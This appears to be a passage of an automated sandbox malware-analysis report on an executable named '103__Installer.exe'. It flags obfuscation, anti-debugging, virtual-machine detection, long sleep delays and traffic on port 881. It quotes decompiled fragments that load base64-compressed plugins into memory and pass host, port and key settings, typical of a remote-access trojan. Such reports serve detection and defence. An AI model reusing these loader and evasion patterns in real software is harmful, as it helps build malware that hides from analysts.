            Source: Binary string: gmscoBB.pdbc source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: %%.pdb source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: ?yoC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3334093675.000000000156B000.00000004.00000020.00020000.00000000.sdmp, WER5186.tmp.dmp.16.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3336013901.0000000006380000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb[ source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER5186.tmp.dmp.16.dr
            Source: Binary string: @yo.pdb source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: System.Management.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: mscorlib.ni.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: System.Management.ni.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3334093675.0000000001559000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: symbols\dll\mscorlib.pdbLb source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.pdb( source: WER5186.tmp.dmp.16.dr
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER5186.tmp.dmp.16.dr
            Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32tM source: 103__Installer.exe, 00000000.00000002.3336013901.00000000063AC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: B.pdbc source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER5186.tmp.dmp.16.dr
            Source: 103__Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: 103__Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: 103__Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: 103__Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: 103__Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            Source: 0.2.103__Installer.exe.5f70000.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.103__Installer.exe.5f70000.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.103__Installer.exe.5f70000.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 0.2.103__Installer.exe.5f70000.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 0.2.103__Installer.exe.5f70000.1.raw.unpack, Messages.cs.Net Code: Memory
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_00B840E4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00B840E4
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_00B7A985 push ecx; ret 0_2_00B7A998
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_00B74948 push eax; ret 0_2_00B74966
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_00B76649 push ecx; ret 0_2_00B7665C
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_05F8CF38 push eax; retf 03B5h0_2_05F8D055
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_05F87550 push es; ret 0_2_05F87560
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_05F8D4E2 pushfd ; retf 0_2_05F8D4F0
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_05F8D3FA push esp; retf 0_2_05F8D3FB
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_05F8D3A5 push esp; retf 0_2_05F8D3A6
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_05F86B88 pushad ; ret 0_2_05F86B89

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 881
            Source: unknownNetwork traffic detected: HTTP traffic on port 881 -> 49707
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\103__Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\103__Installer.exeMemory allocated: 3B40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeMemory allocated: 3DB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeMemory allocated: 3CD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeWindow / User API: threadDelayed 3241Jump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeWindow / User API: threadDelayed 6603Jump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exe TID: 8160Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exe TID: 8172Thread sleep count: 3241 > 30Jump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exe TID: 8172Thread sleep count: 6603 > 30Jump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeFile opened: C:\Windows\SysWOW64\avicap32.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeFile opened: C:\Windows\SysWOW64\MSVFW32.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeFile opened: C:\Windows\SysWOW64\en-US\MSVFW32.dll.muiJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeFile opened: C:\Windows\SysWOW64\en-US\avicap32.dll.muiJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeFile opened: C:\Windows\SysWOW64\wbem\en-US\wmiutils.dll.muiJump to behavior
            Source: Amcache.hve.16.drBinary or memory string: VMware
            Source: Amcache.hve.16.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.16.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.16.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.16.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.16.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.16.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.16.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: 103__Installer.exe, 00000000.00000002.3334093675.0000000001505000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Amcache.hve.16.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.16.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.16.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.16.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.16.drBinary or memory string: vmci.sys
            Source: Amcache.hve.16.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.16.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.16.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.16.drBinary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
            Source: Amcache.hve.16.drBinary or memory string: VMware20,1
            Source: Amcache.hve.16.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.16.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.16.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.16.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.16.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.16.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.16.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.16.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.16.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.16.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: 103__Installer.exe, 00000000.00000002.3334093675.00000000014C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
            Source: Amcache.hve.16.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Users\user\Desktop\103__Installer.exeAPI call chain: ExitProcess graph end nodegraph_0-25695
            Source: C:\Users\user\Desktop\103__Installer.exeAPI call chain: ExitProcess graph end nodegraph_0-25878
            Source: C:\Users\user\Desktop\103__Installer.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_00B765D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B765D1
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_00B840E4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00B840E4
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_03AC1628 mov eax, dword ptr fs:[00000030h]0_2_03AC1628
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_00B87CB1 RpcServerRegisterIf3,__lseeki64_nolock,RpcServerRegisterIf3,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00B87CB1
            Source: C:\Users\user\Desktop\103__Installer.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_00B765D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B765D1
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_00B7A71E _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B7A71E
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_00B7C71D SetUnhandledExceptionFilter,0_2_00B7C71D
            Source: C:\Users\user\Desktop\103__Installer.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_00B71671 cpuid 0_2_00B71671
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00B7F8E5
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_00B7F825
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: GetLocaleInfoA,0_2_00B84859
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,0_2_00B7F988
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00B7F94C
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,0_2_00B7DBBB
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,0_2_00B844BA
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_00B7EC3A
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00B7F45D
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_00B84594
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,0_2_00B7F5F9
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_00B7F552
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,0_2_00B7F654
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_00B7DFDE
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,0_2_00B75FC5
